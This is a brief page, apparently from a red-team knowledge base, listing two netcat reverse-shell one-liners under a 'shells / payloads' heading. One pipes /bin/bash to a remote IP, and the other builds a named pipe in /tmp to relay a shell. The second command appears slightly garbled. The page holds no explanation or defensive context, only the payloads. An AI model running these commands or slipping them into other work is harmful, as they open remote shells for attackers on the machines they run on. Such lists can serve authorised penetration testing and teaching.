Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SHELLS / PAYLOADS

NETCAT


#1
nc 192.168.1.101 5555 -e /bin/bash

#2
rm -f /tmp/p; mknod /tmp/p p && nc 10.10.14.41 4444 0/tmp/p